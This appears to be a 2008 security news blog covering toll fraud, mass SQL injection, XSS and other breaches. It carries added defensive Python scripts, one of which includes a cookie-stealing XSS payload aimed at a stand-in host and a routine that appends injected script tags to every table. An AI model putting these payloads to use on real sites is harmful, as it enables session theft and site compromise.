New Body Scans at Airport Security See Through Clothes

Which would you prefer at the airport security check: a pat down or a "whole body imaging scan" that provides a highly detailed image of all your, um, curves (but does have your face blurred to protect your identity)?

The Transportation Security Administration (TSA) has been testing out these devices, called millimeter wave machines, at Phoenix's Sky Harbor International Airport and this week is adding the machines to Los Angeles International Airport and New York City's John F. Kennedy International.

The TSA says that during the test in Phoenix, 90 percent of travelers preferred the scan to having a full body pat down. The TSA agent viewing the image from one of the devices will be in a separate booth and will not be able to see the traveler's face in order to maintain privacy. After the image has been checked it won't be stored, according to the TSA.

Even so, are these images invasive? What about privacy concerns? According to the TSA blog, "These images are friendly enough to post in a preschool. Heck, it could even make the cover of Reader's Digest and not offend anybody."

The TSA also claims the machine emits 10,000 times less energy than a cell phone transmission.

You can see how the body image is captured in a video here and also watch a demonstration of the actual machine in motion here.

Millimeter wave machines are already in use at airports in Britain, Spain, Japan, Australia, Mexico, Thailand and the Netherlands. [Source CNN]

Posted in | 0 comments

One hack of a phone bill

At least one Australian company every day falls victim to telephone hackers, who rack up an average bill of $78,000, a national telephone security expert said yesterday.

David Stevens, managing director of Telecoms Security, said most businesses did not realise how easy the attacks were until it was too late.

Australian Federal Police last night confirmed they were working with their international counterparts to stop hackers hitting Australian businesses, after it was revealed that criminals had penetrated the phone systems of at least two Melbourne companies in recent weeks.

The scam is allegedly being carried out by overseas manufacturers of international phone cards commonly used by students and tourists to make cheap calls.

The card manufacturers are believed to then hack into unsuspecting companies' phone systems, known as private automatic branch exchanges (PABXs), so that the calls made by card users are charged to the victims of the scam.

The Camberwell Electrics Superstore and Swinburne University have both been hit with collective phone bills of more than $100,000 of overseas calls. Camberwell Electrics' accountant Chris Koh said the company had been alerted when Telstra called it to ask why they had made $20,000 in overseas calls in less than two weeks.

"The calls were made to Romania, other parts of Eastern Europe, India, Russia and Asia out of office hours," Mr Koh said.

He said the hackers had bypassed codes, passwords and other security systems. Computers ran through combinations in milliseconds until they found the right one to exploit.

A Swinburne University spokeswoman said the university knew nothing of the scams until it received an $80,000 phone bill.

The university's chancellery executive director, Michael Thorne, said the charges related to phone numbers the organisation did not own.

Both companies are fighting Telstra over the bills.

But Mr Stevens said that while most companies took extra steps to protect their IT security from hackers, many left their telephone systems - both traditional PABX systems and modern VoIP systems - vulnerable.

He said telephone hacking was a lot more common than most people realised, and the onus was on businesses to protect themselves.

"Our figures show that one Australian company is being hacked every single day," he said.
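The Camberwell case was only spotted when the carrier rang about the bill. The check a business can run for itself is a review of its own call detail records, flagging extensions that rack up after-hours international minutes. The script below is an added example written for this page, not code from the article or from Telecoms Security. It assumes a hypothetical CSV export with the columns timestamp, extension, dialled and seconds; the international dialling prefix, the office hours, the threshold and the sample records are all constructed for illustration.

```python
"""Toll-fraud triage over PABX call detail records (CDRs).

Added example; not code from the article or from Telecoms Security.
Assumes a hypothetical CSV export with the columns timestamp, extension,
dialled and seconds. The international prefix, office hours and per-day
threshold are assumptions chosen for illustration.
"""
import csv
import io
from collections import defaultdict
from datetime import datetime, time

# Constructed sample records. The first three mimic the pattern in the article
# (long after-hours calls from one extension to Eastern Europe and Asia); the
# last two are ordinary daytime traffic that should not be flagged.
SAMPLE_CDR = """timestamp,extension,dialled,seconds
2008-04-05T02:14:00,201,001140722123456,1820
2008-04-05T02:45:00,201,00117921112233,2400
2008-04-06T03:10:00,201,0011912233445566,3600
2008-04-07T10:05:00,115,0398765432,120
2008-04-07T11:30:00,118,0011442071234567,300
"""

INTL_PREFIX = "0011"                       # assumed international access code
OFFICE_HOURS = (time(8, 0), time(18, 0))   # assumed Monday-Friday business hours
MAX_AFTER_HOURS_INTL_MINUTES = 30          # assumed per-extension, per-day threshold


def parse_cdr(text):
    """Parse the CSV export into dicts with a datetime and the call length in minutes."""
    rows = []
    for rec in csv.DictReader(io.StringIO(text)):
        rows.append({
            "ts": datetime.fromisoformat(rec["timestamp"]),
            "ext": rec["extension"],
            "dialled": rec["dialled"],
            "minutes": int(rec["seconds"]) / 60,
        })
    return rows


def is_after_hours(ts):
    """Weekends, or any weekday time outside OFFICE_HOURS."""
    start, end = OFFICE_HOURS
    return ts.weekday() >= 5 or not (start <= ts.time() < end)


def flag_toll_fraud(rows):
    """Return {(extension, date): after-hours international minutes} for every
    extension/day whose total exceeds the threshold."""
    totals = defaultdict(float)
    for r in rows:
        if r["dialled"].startswith(INTL_PREFIX) and is_after_hours(r["ts"]):
            totals[(r["ext"], r["ts"].date().isoformat())] += r["minutes"]
    return {key: mins for key, mins in totals.items()
            if mins > MAX_AFTER_HOURS_INTL_MINUTES}


if __name__ == "__main__":
    for (ext, day), mins in sorted(flag_toll_fraud(parse_cdr(SAMPLE_CDR)).items()):
        print(f"extension {ext} on {day}: {mins:.0f} after-hours international minutes")
```

Run daily against the previous day's export, this catches the Camberwell pattern (one extension, overnight, Romania and India) within a day rather than after two weeks of billing. It will not see calls that a hacked PABX routes without writing a record, so the other half of the control is the configuration review the article hints at: default voicemail PINs, DISA (remote dial-in) left enabled, and trunk-to-trunk transfer allowed out of hours.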


IIS Hack

Mystery IIS Hack Unveiled

Researchers at SANS have discovered how thousands of Web sites were compromised earlier this year. As a result of the break-ins countless users' computers were infected with malware.

Back in January, thousands of sites running Internet Information Server (IIS) and SQL Server were cracked by what at the time was thought to be some sort of SQL injection attack. As it turns out, that is exactly what happened.

While reviewing malicious files served up by a particular server, researchers at SANS stumbled upon an attack tool that revealed exactly what was being done to crack the affected sites. According to the analysis provided by researcher Bojan Zdrnja, the tool queries Google to discover sites that are potentially vulnerable, then launches SQL injection attacks against each identified site. The tool's interface is written in Chinese, and it also contains logic that attempts to contact a site in China to record transaction data.

A SANS blog reader, Nathan, wrote to elaborate on the nature of the SQL query itself. According to Nathan, the query used by the tool iterates through all tables to find specific types of columns and then appends data to existing column field data. The data then appears as part of Web pages at affected sites.
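Walking every table for text columns is the same enumeration a defender needs after a compromise: the injected markup has to be found and stripped in every cell it was appended to. The script below is an added example written for this page; it is not the tool SANS analysed or any code from the article. It takes the defender's view of the logic Nathan describes, using an in-memory SQLite database as a stand-in for the SQL Server backend. The tables, rows, declared column types and the script-tag payload are constructed for illustration.

```python
"""Scan every text column of every table for injected markup, and strip it.

Added example; not the SANS-analysed tool or code from the article. Uses an
in-memory SQLite database as a stand-in for the SQL Server backend. Tables,
rows, type names and the payload are constructed for illustration.
"""
import re
import sqlite3

# The 2008 wave appended <script> or <iframe> tags. Match a whole tag pair so
# the cleanup removes exactly the injected fragment and nothing else.
INJECTED_MARKUP = re.compile(r"<(script|iframe)\b[^>]*>.*?</\1\s*>",
                             re.IGNORECASE | re.DOTALL)
TEXT_TYPES = ("TEXT", "CHAR", "NCHAR", "VARCHAR", "NVARCHAR", "CLOB")


def build_sample_db():
    """Constructed content database: two tables, a mix of text and numeric columns."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(100), price REAL);
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO products VALUES (1, 'Widget', 9.99), (2, 'Gadget', 19.99);
        INSERT INTO news VALUES (1, 'Launch', 'We launched.'), (2, 'Hiring', 'We are hiring.');
    """)
    return con


def tables(con):
    return [r[0] for r in con.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]


def text_columns(con, table):
    """Names of columns whose declared type is a character type.
    PRAGMA table_info rows are (cid, name, type, notnull, dflt_value, pk)."""
    return [row[1] for row in con.execute(f'PRAGMA table_info("{table}")')
            if (row[2] or "").upper().startswith(TEXT_TYPES)]


def simulate_mass_injection(con, payload):
    """What the attack tool did to a compromised backend: append the payload to
    every text column of every table. Identifiers come from the catalogue, not
    from user input, which is why quoting them into the statement is acceptable."""
    for table in tables(con):
        for col in text_columns(con, table):
            con.execute(f'UPDATE "{table}" SET "{col}" = "{col}" || ?', (payload,))
    con.commit()


def scan_for_injection(con):
    """Return (table, column, rowid) for every cell that carries injected markup."""
    hits = []
    for table in tables(con):
        for col in text_columns(con, table):
            for rowid, value in con.execute(f'SELECT rowid, "{col}" FROM "{table}"'):
                if isinstance(value, str) and INJECTED_MARKUP.search(value):
                    hits.append((table, col, rowid))
    return hits


def clean_injection(con):
    """Strip the injected markup from every flagged cell; return the number of cells fixed."""
    fixed = 0
    for table, col, rowid in scan_for_injection(con):
        (value,) = con.execute(f'SELECT "{col}" FROM "{table}" WHERE rowid = ?',
                               (rowid,)).fetchone()
        con.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?',
                    (INJECTED_MARKUP.sub("", value), rowid))
        fixed += 1
    con.commit()
    return fixed


if __name__ == "__main__":
    db = build_sample_db()
    simulate_mass_injection(db, '<script src="http://example.invalid/x.js"></script>')
    print("infected cells:", scan_for_injection(db))
    print("cleaned:", clean_injection(db), "remaining:", scan_for_injection(db))
```

Cleaning the data does not close the hole. The attack only worked because the web application's database login could read the catalogue and write to every table; the durable fix is parameterised queries in the application and a database account that can touch only the tables and operations the pages actually need.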

The SANS blog entry has links to a number of Web pages that can help administrators secure their sites against SQL injection attacks.


Unplugged 'system error'

MySpace profile hack provides early warning to predators

A security issue on MySpace may put a spanner in the works of law-enforcement efforts to track miscreants using the social networking site.

Many MySpace profiles contain code that subscribes visitors to a profile's video channel. Normally this is all well and good, but hackers are able to subvert the feature for malicious purposes, according to Chris Boyd, security research manager at FaceTime Communications.

Hackers have set up dozens of accounts used as a springboard for spamming or attempts to vandalise other profiles.

The feature (used in conjunction with an IP address tracker) might also be employed by predators to keep tabs on anyone who might be tracking their activities, Boyd says. Although MySpace has made attempts to prohibit the use of IP trackers, miscreants have found a way around these blocks.

Crackers "are using every trick in the book they can to know who is watching them," Boyd said.

In particular, the feature could be used by predators to detect whether their attempts to groom youngsters have come to the attention of law enforcement, potentially frustrating evidence gathering in child abuse investigations.

The tactic has been in play since at least October 2007. MySpace was informed of the issue in late March but is yet to act. According to Boyd, the social networking site has responded to his concerns about the issue by describing it as a "system error".

Pending a fix from MySpace itself, Boyd has posted advice to surfers about how to avoid tracking here, a tip child abuse investigators might well find useful.


Healthcare IT failing on security

Mobile working pushes up data loss risk

The IT security threat posed by healthcare workers is rising as they become increasingly mobile and use laptops containing sensitive patient information.

Unlike some other parts of the world, UK law does not protect data kept on healthcare computer systems beyond 'duty of care' and a professional requirement for patient confidentiality.

The warning from Absolute Software, which specialises in computer theft and asset tracking, follows a spate of high-profile data loss incidents in recent months, including the NHS losing hundreds of thousands of patients' records.

Absolute Software said that, while encryption provides strong external security, the biggest threat is from within.

Employees can get access to encrypted information as they have encryption keys and passwords. Organisations are advised to complement encryption with the ability to remotely delete data from missing computers for the highest level of protection.

The healthcare sector also fails to keep an accurate inventory of mobile computer assets. Absolute believes that, at best, only a fraction of laptops can be accounted for by IT managers.

Many hospitals and clinics allow information to be accessed on open-air terminals, such as ward and nursing stations. But these workstations are at great risk of data breaches and information can be easily accessed and downloaded.

Absolute said that unattended stationary computers should always be monitored and protected with an authentication prompt.

The company also highlighted the difficulty in implementing a comprehensive data security plan.

Healthcare facilities are advised to institute a comprehensive data security plan to secure computing assets and sensitive information which includes both IT and physical precautions.

Asset tracking and recovery software should be part of a comprehensive approach, which also includes cable locks, encryption software and secure passwords, the company said.

Lastly, few healthcare facilities have "nightmare scenario" policies in place should a data breach occur.

There should be a standard procedure in place to manage the event, from timely notification of supervisors to informing the police.

Absolute said that, in a data breach situation, computer theft recovery software solutions have the capability to remotely delete sensitive files, track lost or stolen computers and partner with local police in order to recover them.


Group releases credit-card software standard

The PCI Security Standards Council announced on Tuesday an updated version of its security standards for applications that process credit-card transactions, aiming to prevent data breaches such as those at Hannaford Bros. and the TJX Companies.

Known as the Payment Application Data Security Standard (PA-DSS), the compliance effort will allow the Council to become a "one-stop shop" for merchants who want to search for applications and services that will not increase their exposure to attacks, a PCI Security Standards Council spokesperson said. Version 1.1 of the standard (pdf) will make certain that payment applications do not store sensitive data, such as the information typically stored on the magnetic stripe on the back of credit and debit cards.

"Having a single source of information on approved payment applications and security assessors provides business value to merchants and service providers and allows them to make informed choices regarding the security of their payment application," Bob Russo, general manager for the PCI Security Standards Council, said in a statement announcing the new standard.

The latest version of the application-security standard follows the revelation that online data thieves managed to make off with millions of credit- and debit-card numbers from grocery store chain Hannaford Bros. In 2007, retail giant TJX Companies also announced a large data breach, and by the end of the year, estimates of the size of the loss surpassed 100 million credit- and debit-card numbers. While TJX Companies had not complied with the PCI Data Security Standard, it is currently not known whether Hannaford Bros. had remained in compliance. According to Visa, about three-quarters of large companies and two-thirds of medium-sized firms had complied with the PCI's payment security standards by the end of 2007.

The PCI Security Standards Council plans to certify companies over the next year to be Payment Application Qualified Security Assessors (PA-QSAs). The application standard is based on Visa's Payment Applications Best Practices (PABP) requirements for its merchants.


Fring Brings VoIP to Hacked iPhones

Fring, the company founded by Avi Shechter, the former co–CEO of ICQ and VP at AOL, has announced that it released a test version of its popular application which brings Skype, as well as MSN, Google Talk and AIM to Apple's iPhone.

"This special pre-release version of fring, developed in conjunction with the Holon Institute of Technology academic research labs is a direct response to iPhone users kicking our behind to get fring for their COOOOOL devices," the company said on its website.

"Part of the objective here (besides getting you all excited with fring for iPhone) is to get feedback prior to release of the full-feature version and create a truly superb user experience for iPhone users," Fring says.

The fring application is only available to those who have jailbroken their iPhones or iPod Touches. The application is not endorsed by Apple, which opposes VoIP applications for its devices: access to free calls could dramatically cut into the profit margins of the carriers licensed to supply the handset, and everything Apple does is about large profit margins (like its Mac desktop computers). The application also runs in the background, which Apple forbids.

Of course, the iPod Touch does not have a microphone so you need the Touchmods dock connector microphone.

Fring, also co-founded by Boaz Zilberman and Alex Nerst, is headquartered in Israel, and has representation in Italy, UK and Germany. In February, BusinessWeek reported that more than 100,000 new users from 160 countries were downloading, installing, and registering to use fring each month.


iPhone vulnerable to DoS attack

A security firm claims to have uncovered a denial-of-service vulnerability in version 1.1.4 of Apple's Safari web browser for the iPhone.

Radware said that the phone is vulnerable to DoS attacks owing to a design flaw that may be triggered by a series of memory allocation operations on the dynamic memory pool, which in turn triggers a bug in the garbage collector.

"While vendors are struggling to push new products and applications, it is evident that security still remains a secondary concern," said Itzik Kotler, security operation centre manager at Radware.

"Hackers continue to misappropriate other people's software and their job is made easier by design flaws embedded into software products."

To exploit the vulnerability, an iPhone user must open an HTML page containing JavaScript that triggers the flaw.

Once the page loads, an application-level DoS attack crashes the Safari browser and could go as far as crashing the iPhone completely.

Users could be lured to sites containing this attack via links in spam messages or other social engineering techniques.

It is unclear whether the fault can cause any permanent damage to the phone or is simply a nuisance.


Women love chocolate more than password security

Women are four times more likely than men to give out "passwords" in exchange for chocolate bars.

A survey of 576 office workers in central London found that women are far more likely than their male counterparts to give away their computer passwords to total strangers, with 45 per cent of women versus ten per cent of men prepared to give away their login credentials to strangers masquerading as market researchers.

The survey, conducted outside Liverpool Street Station in the City of London, was actually part of a social engineering exercise to raise awareness about information security in the run-up to next week's Infosec Europe conference.

Infosec has conducted similar surveys every year for at least the last five years involving punters apparently handing over login credentials in exchange for free pens or chocolate rewards.

Little attempt is made to verify the authenticity of the passwords, beyond follow-up questions asking what category it falls under. So we don't know whether women responding to the survey filled in any old rubbish in return for a choccy treat or handed out their real passwords.

This year's survey results were significantly better than previous years. In 2007, 64 per cent of people were prepared to give away their passwords for a chocolate bar, a figure that dropped 21 per cent this time around.

So either people are getting more security-aware or more weight-conscious. And with half the respondents stating that they used the same passwords at home and work, then perhaps the latter is more likely.

Taken in isolation the password findings might suggest the high-profile HMRC data loss debacle had increased awareness about information security. However, continued willingness to hand over personal information that could be useful to ID fraudsters suggests otherwise.

The bogus researchers also asked for workers' names and telephone numbers, ostensibly so they could be entered into a draw to go to Paris. With this incentive 60 per cent of men and 62 per cent of women handed over their contact information. A similar percentage (61 per cent) were happy to hand over their dates of birth.


Students hack into school computer system in western New York

WILLIAMSVILLE, N.Y. (AP) - Authorities say several current and former students broke into a school district's computer system in western New York last month and copied secure files that included the personal information of employees.

The computer breach by Williamsville North High School students marks the third incident in the past month. Students in the Grand Island and West Seneca districts have been charged with unauthorized computer use.

Amherst Police Chief John Askey tells the Buffalo News that students overrode the security defenses of a classroom computer at Williamsville North and went trolling for information.

At least three individuals are suspected, and several more knew about it. Those involved have told police they simply were interested in how far they could get into the system.

Askey adds that several of the hackers are considered "very bright kids" and good students with no lengthy disciplinary records. It may take weeks to determine the extent of the breach.

Superintendent Howard Smith sent a letter this week to the district's 1,800 employees, asking them to notify police if they uncover any suspicious credit card or banking activity.

Copyright 2008 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.


Semiautonomous orbs rock Yuri's Night

MOUNTAIN VIEW, Calif.--Corey Fro is chasing a large metal orb across the pavement at the NASA Ames Research Center here. He is desperately trying to make sure that the orb doesn't crush a nearby robot.

The orb in question is being remotely directed by a kid wielding an Xbox-like wireless controller, but it's the kid's first time using the device, and he really doesn't have any idea what he's doing.

And that's why the orb has rolled away and is bearing down rapidly on the unsuspecting and defenseless robot a few yards away. In the end, Fro caught the wayward sphere and saved the day, or at least the innocent robot.

If this sounds unusual, it isn't. At least not at Yuri's Night, a 12-hour celebration of space, science, music, and art held at NASA Ames and other locations around the world Saturday in honor of Russian cosmonaut Yuri Gagarin's first flight into space.

The orb is part of Swarm, a project designed for Burning Man built around the concept of autonomous spheres that can be programmed to perform in one of many ways.

Or, as Fro put it, "They're kinetic sculptures that drive around in an autonomous but choreographed pattern."

Fro is just one of about 30 people who built the orbs for Burning Man 2007, and now the project is returning to Burning Man 2008 as an art piece partially funded--and therefore honored as noteworthy--by the curators of the annual countercultural arts festival.

But before it can go back out to the Nevada desert, Swarm had to make an appearance at Yuri's Night, and it was certainly one of the main attractions for the thousands in attendance Saturday.

And that's at least in large part because of what they can do.

"The orbs control their own movement, light show, and music," explained Fro. "The way they do that is by communicating with the mother node."

"The Swarm of autonomous beings by their very nature will have emergent and complex behavior," the project's Web site states. "They will flock, flirt, dance and interact, and their actions will surprise and astonish even us, their creators. They are simple, but together they will behave in ways more complex than we can predict."

The idea is that five of the six orbs--which look something like specialized see-through hubcaps turned into spheres with really expensive robotic controls and LEDs inside--are subservient to the desires of the lead orb, or mother node.

The only information the subservient orbs send out is GPS and accelerometer data, which they send to the lead orb, which, Fro said, uses that information to coordinate the movements and lighting effects of all the spheres.

"So the movement coordination allows it to follow the leader, drive in patterns or (even) make the orb representation of planetary systems," Fro said. "But once they're running under control of the mother node, there's no control from humans."

That means, once all the orbs are in motion--something that wasn't on display at Yuri's Night--the only way to stop them is direct the mother node to stop.

Each orb, Fro said, is driven by counterbalancing using the weight of lead-acid batteries as ballast. By swaying the ballast forward, the orb moves forward as the center of gravity changes.

"To turn right or left," Fro said, "we swing the ballast right or left."

At Burning Man, where the entire project, in its 2008 configuration, will be unfurled, the Swarm team plans to erect a mast on the open desert floor that projects a large laser circle on the ground.

The idea is to define a safety zone so that pedestrians, bicyclists, and those on other forms of conveyance are safe.

"If they walk into that circle," Fro said, "all bets are off."

I was very happy to see the orbs at Yuri's Night because Swarm was one of the legendary art projects I missed at Burning Man 2007. It was something I heard a lot of people talk about after the fact in very reverent terms.

And as befits many Burning Man art projects, the 2008 version is sure to be new and improved. In fact, Fro said, the Xbox-like controllers were a big part of what's new for this year: joysticks that can allow anyone to take very subtle control over the orbs.

But it's also very easy to lose control of them, as I saw multiple times on Saturday as Fro would hand the controller over to one person or another.

"Try not to rock it so much," he said to someone at one point, "because if you hit the kill switch, it will stop."


Colombian cyber-crook jailed for nine years

A Colombian citizen has been sentenced to nine years in prison for a complex computer fraud which affected more than 600 people.

Mario Simbaqueba Bonilla, 40, was also sentenced to three years supervised release on his exit from prison, and ordered to pay restitution of $347,000.

Simbaqueba Bonilla pleaded guilty in January to charges of conspiracy, access device fraud and aggravated identity theft.

According to the charges Simbaqueba Bonilla, alone and in concert with a co-conspirator, engaged in a complex series of computer intrusions, identity thefts and credit card frauds designed to steal money from payroll, bank and other accounts.

The court recognised the attempted and actual loss from the scheme at $1.4m.

Much of the identity theft, initiated from computers in Colombia, targeted individuals residing in the US, including Department of Defense personnel.

Simbaqueba Bonilla used the money to buy expensive electronics and luxury travel and accommodation in various countries, including Hong Kong, Turks and Caicos, France, Jamaica, Italy, Chile and the US.

The man engaged in a conspiracy between 2004 to 2007 that began with illegally installing keystroke logging software on computers located in hotel business centres and internet lounges around the world.

This software collected the personal information of those who used the computers, including passwords and other identifying information used to access bank, payroll, brokerage and other accounts online.

Simbaqueba Bonilla used the data to steal or divert money into accounts he had created in the names of other people he had victimised in the same way.

Through a complex series of electronic transactions designed to cover his trail, Simbaqueba Bonilla transferred the stolen money to credit, cash or debit cards and had the cards mailed to himself and others at commercial mailing addresses.

Federal agents arrested Simbaqueba Bonilla when he flew into the US in August 2007.

At the time of his arrest, Simbaqueba Bonilla was flying on an airline ticket purchased with stolen funds, and had in his possession a laptop also purchased with stolen funds.

The laptop contained the names, passwords and other personal and financial information of more than 600 people.


Database Trojan infests pro-Tibet websites

Security researchers have unearthed more details about a Trojan that targets backend databases as well as desktop clients.

The Fribet Trojan has been planted on pro-Tibet websites, possibly using a Vector Markup Language flaw (MS07-004) patched by Microsoft early last year. When visitors to the pro-Tibet websites are infected, the Fribet Trojan creates a backdoor on compromised hosts.

In addition, the Trojan loads a "SQL Native Client" ODBC library that is designed to execute arbitrary SQL statements received from a command and control server. This gives the attackers the ability to run arbitrary SQL commands from compromised machines against any database servers those machines can reach, and so to steal data or modify databases, provided they are able to log on to those databases in the first place.

The attacker still needs to find out the host name, database name, username and password. However, monitoring functions included with Fribet as well as easily-guessable weak and default values might leave the door open for hackers, net security firm McAfee reports.

The Fribet Trojan emerges little more than a month after SQL injection attacks, which inserted iFrame links to sites hosting exploit scripts and malware on legitimate websites.

Unlike those attacks, the Fribet Trojan can be used against sites that are protected against conventional SQL injection attacks, McAfee researchers Shinsuke Honjo and Geok Meng Ong explain.

"This Trojan apparently can be used as an alternate to SQL Injection attacks, but in a more direct way," they write. "Even the administrators of secure web sites, protected against common SQL injection attacks, should ensure database backends are equally secure to defend against such a penetration vector."


Hackers exploit poor website code

Web designers making very old mistakes are letting malicious hackers hijack visitors to their sites, say experts.

Many of the loopholes left in the code created for websites have been known about for almost a decade say the security researchers.

The poor practices are proving very attractive to hi-tech criminals looking for a ready source of victims.

According to Symantec the number of sites vulnerable in this way almost doubled during the last half of 2007.

Wholly vulnerable

Kevin Hogan, director of security operations at Symantec, said the bug-ridden web code was putting visitors to many entirely innocent sites at risk.

"It overturns the whole notion that if you stay away from gambling and porn sites you are okay," he said.

The attack that a malicious hacker can carry out via these web code vulnerabilities is known as cross-site scripting (abbreviated as XSS).

Typically these involve lax control of the data being swapped between a web server and the browser program someone is using to interact with it.

An XSS vulnerability could, for instance, allow attackers to steal the login credentials of a visitor to a site.
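The "lax control of the data being swapped" is concrete: a value from the query string is pasted into the page without encoding for the context it lands in. Below is an added example written for this page, not code from the article, Symantec or Veracode, showing the vulnerable rendering beside the hardened one. The tiny "search results" page, the request URLs and the payloads are constructed for illustration; a template engine with auto-escaping enabled does by default what render_hardened does by hand.

```python
"""Reflected XSS: the vulnerable rendering pattern beside the hardened one.

Added example; not code from the article, Symantec or Veracode. The page
template, request URLs and payloads are constructed for illustration.
"""
from html import escape
from urllib.parse import parse_qs, quote, urlsplit

PAGE = ('<html><body><h1>Results for: {query}</h1>'
        '<a href="{link}">Search again</a></body></html>')


def search_url(user_input):
    """Build the request URL the way a browser would (query string percent-encoded)."""
    return "/search?q=" + quote(user_input, safe="")


def query_param(url):
    """Decode the q parameter as the server sees it."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(url):
    """Untrusted input is pasted into HTML text and into an attribute unchanged:
    a <script> payload runs, and a double quote breaks out of the href."""
    q = query_param(url)
    return PAGE.format(query=q, link="/search?q=" + q)


def render_hardened(url):
    """Encode for the context the data lands in: HTML-escape for element text;
    percent-encode the value that goes inside the URL, then escape the whole
    attribute value (a no-op for percent-encoded text, but it keeps the rule
    'every attribute value is escaped' uniform)."""
    q = query_param(url)
    return PAGE.format(query=escape(q, quote=True),
                       link=escape("/search?q=" + quote(q, safe=""), quote=True))


def contains_active_markup(html):
    """Crude check used only to show the difference: is a raw script tag or an
    attribute break-out left in the output?"""
    return "<script" in html.lower() or '"><' in html


if __name__ == "__main__":
    # Constructed payloads: cookie theft via element text, and an attribute break-out.
    for payload in ("<script>new Image().src='http://evil.invalid/?c='+document.cookie</script>",
                    '"><script>alert(1)</script>'):
        url = search_url(payload)
        print("vulnerable:", contains_active_markup(render_vulnerable(url)),
              " hardened:", contains_active_markup(render_hardened(url)))
```

The point of the two encoders is that the rule depends on where the data goes: HTML-escaping alone is not enough inside a URL attribute, and percent-encoding alone is not enough inside element text. Stripping tags from the input is the wrong layer, because the same value may land in several contexts.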

Mr Hogan said more and more attackers were looking for websites that were vulnerable to these scripting attacks because they required little work to mount.

By contrast, said Mr Hogan, a phishing attack required the creation of tempting e-mails, fake servers and dead-drops to gather data.

In its most recent Internet Security Threat Report Symantec identified 11,253 specific XSS vulnerabilities in the last six months of 2007. Six months earlier the count stood at 6,961.

Symantec said there were likely many more vulnerable sites that had not been reported.

Drawing its data from XSSED which gathers data on these vulnerabilities, Symantec said only 473 of these loopholes had so far been fixed.

Website administrators had a poor record of closing loopholes, it said.

"Attackers..., can expect that [a] site maintainer will not address the vulnerability in a reasonable amount of time, if at all," said the report.

"There are a lot more websites out there that are prone to this," said Mr Hogan. "It's a much bigger proposition to make a safe website than it is to patch a browser."

Chris Wysopal, co-founder and chief technology officer at Veracode which produces online tools that scan code for security flaws, said the problem was getting worse.

"I do not see trends slowing this down," he said.

XSS attacks were becoming more popular because more and more websites were writing their own snippets of code so visitors could get more out of a site, he said.

Unfortunately, he added, the same mistakes were being made in this custom code years after they were first discovered.

"The problem was identified eight years ago or so," he said. "Over time attackers have figured out better and more interesting things to do with cross-site scripting."

He added: "It's such a target rich environment I do not think the attackers need to have a very sophisticated way to harvest sites for vulnerabilities."

Automated web tools were available that can scan custom web code and highlight vulnerabilities but few web designers used them, said Mr Wysopal.

"The awareness is not there that if you write code you need to test it before you put it out there," he said.


Who trumps bin Laden as a cyberthreat? Look in the mirror

SAN FRANCISCO--It turns out al-Qaida's leader and his cohorts aren't the biggest threat to our cybersecurity. You are.

Six years ago, Osama bin Laden represented the nightmare scenario for the computer security establishment. But more immediate cyberdangers lurk on the horizon. Experts attending the RSA conference that began here today say it's you--Mr. & Mrs. Computer User--who keep goofing up.

In fact, they contend, the future of cybersecurity hinges less on a latter-day version of spy-versus-spy against shadowy terror groups than on a more serious effort to instill best practices. Listening to their warnings was something akin to the scene in the movie Groundhog Day, where Bill Murray repeatedly wakes up to the same morning.

Security gurus have long urged the business world to turn network security into part of the corporate DNA. The message is not fully getting through. And now we're seeing the predictable results.

After listening to Symantec's John Thompson's morning keynote, I later kidded him about purposely scaring the hell out of people. He was a good sport about my joshing but pointed out that the information security landscape is increasingly punctuated by cases of data theft. He backed that up by reciting a litany of worrisome stats from his company's latest Internet security threat report. Truth be told, it makes for grim reading.

[Photo: Symantec CEO John Thompson. Credit: Charles Cooper/CNET News.com]
Among the report's highlights:

• 65 percent of the new code being released into the market is malicious
• The U.S. was the top country of attack origin in the second half of 2007
• The education sector accounted for 24 percent of data breaches that could lead to identity theft
• Government was the top sector for identities exposed, accounting for 60 percent of the total
• Theft or computer loss resulted in the most data breaches that could lead to identity theft
• The United States had the most bot-infected computers worldwide

If the statistics are accurate, rank-and-file computer users are far from internalizing the security mantra. What's more, the findings suggest it will be quite some time before most people treat computer security as more than an afterthought. In the meantime, of course, Thompson didn't preclude the possibility of a terror or state-based organization launching a big cyber attack. But he believes the more likely danger to the nation's infrastructure will emanate from a different quarter.

"The threat landscape has changed," he said. "When people used to talk about the 'Big One,' they were thinking about that in the context of an attack on the infrastructure itself. That's still possible but less probable today because attackers have shifted to the information itself. They're much more stealth-like. Before, they wanted to become obnoxiously visible. Now they don't. They want to quietly penetrate defenses so they can sell what they steal in what's become a growing underground economy."

DHS Secretary Michael Chertoff (Credit: Charles Cooper/CNET News.com)

(He's got a point. Symantec's report found that bank accounts are the most commonly advertised item for sale on underground economy servers, accounting for 22 percent of all activity tracked.)

In years past, Thompson and other computer security executives have pushed the idea of making cyber-security as familiar to most people as the fire prevention campaign underwritten by the government in the 1960s and 1970s. Considering the amount of money Uncle Sam is spending on cyber-security these days, that's a pipe dream.

Department of Homeland Security Secretary Michael Chertoff, who also presented a keynote on Tuesday, offered little indication Washington was about to ride to the rescue. In remarks during his prepared speech and subsequent press conference, Chertoff offered a dutiful recitation of what he described as the President's interest in shoring up the nation's digital security.

But despite Chertoff's repeated commitment to doing the right thing - including a call to arms inviting Silicon Valley's best and brightest technologists to come to Washington to work on cyber-security - I wonder how many industry skeptics he'll win over. Until recently, DHS couldn't get a cyber-security director to stay in what essentially was a figure-head job much longer than a year. Off-the-record interviews with people familiar with the goings-on there have described the situation to me as a bureaucratic mess.

DHS finally staffed up by putting in Greg Garcia, a former official with the Information Technology Association of America trade organization, as assistant secretary for cybersecurity and telecommunications. More recently, Rod Beckstrom, an author and entrepreneur best-known for starting business collaboration software maker Twiki.net, was in charge of directing a national cybersecurity center that operates inside DHS.

Give Chertoff credit for being candid about where DHS has come up short. He said the government needs to reduce its (literally) thousands of network access points to around 50. At the same time, Chertoff wants his department to detect and analyze computer anomalies faster. A big part of that will involve a revamp of U.S. CERT's early warning system.

"Even giving an adversary one bite at the apple before we've figured out the meta data or (digital) signature is one bite too many," he said.

